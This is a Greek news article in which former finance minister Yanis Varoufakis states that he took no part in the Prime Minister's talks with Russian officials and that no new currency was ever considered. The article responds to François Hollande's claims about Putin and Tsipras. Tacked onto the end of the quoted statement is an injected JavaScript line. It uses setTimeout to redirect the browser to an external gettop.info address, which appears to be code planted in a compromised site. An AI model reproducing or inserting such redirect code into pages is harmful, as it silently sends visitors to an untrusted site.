Καρφιά Βαρουφάκη: Δεν ξέρω τι συζητήθηκε με τους Ρώσους- Δεν συμμετείχα στις διαβουλεύσεις

0
3

 

Με ανακοίνωσή του ο πρώην υπουργός Οικονομικών Γιάνης Βαρουφάκης διευκρινίζει ότι δεν συμμετείχε ποτέ σε διαβουλεύσεις του πρωθυπουργού με Ρώσους αξιωματούχους. Αφορμή στάθηκαν οι «αποκαλύψεις» του Γάλλου προέδρου Φρανσουά Ολάντ σχετικά με τον Βλαντίμιρ Πούτιν και τη συζήτηση του με τον Αλέξη Τσίπρα για κοπή χαρτονομισμάτων στη Ρωσία.

Όπως αναφέρθηκε χαρακτηριστικά στην ανακοίνωση του:

«Επειδή ζητήθηκαν από πολλά μέσα ενημέρωσης (εγχώρια και ξένα) σχόλια του κ. Βαρουφάκη σχετικά με τα δημοσιεύματα του ξένου Τύπου για τους ισχυρισμούς του κ. Φ. Ολάντ όσον αφορά συνομιλία του με τον Β. Πούτιν, ο κ. Βαρουφάκης επισημαίνει τα εξής:

«Κατά την διάρκεια της υπουργίας μου δεν είχα συμμετάσχει στις διαβουλεύσεις του πρωθυπουργού με Ρώσους αξιωματούχους και, συνεπώς, δεν γνωρίζω τι συζητήθηκε. Όμως μπορώ να επιβεβαιώσω, ότι κατά την διάρκεια της θητείας μου στο Υπουργείο Οικονομικών δεν υπήρξε καμία σκέψη για τύπωμα νέου νομίσματος, πόσο μάλιστα προσέγγιση τρίτων είτε στο εσωτερικό είτε στο εξωτερικό». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here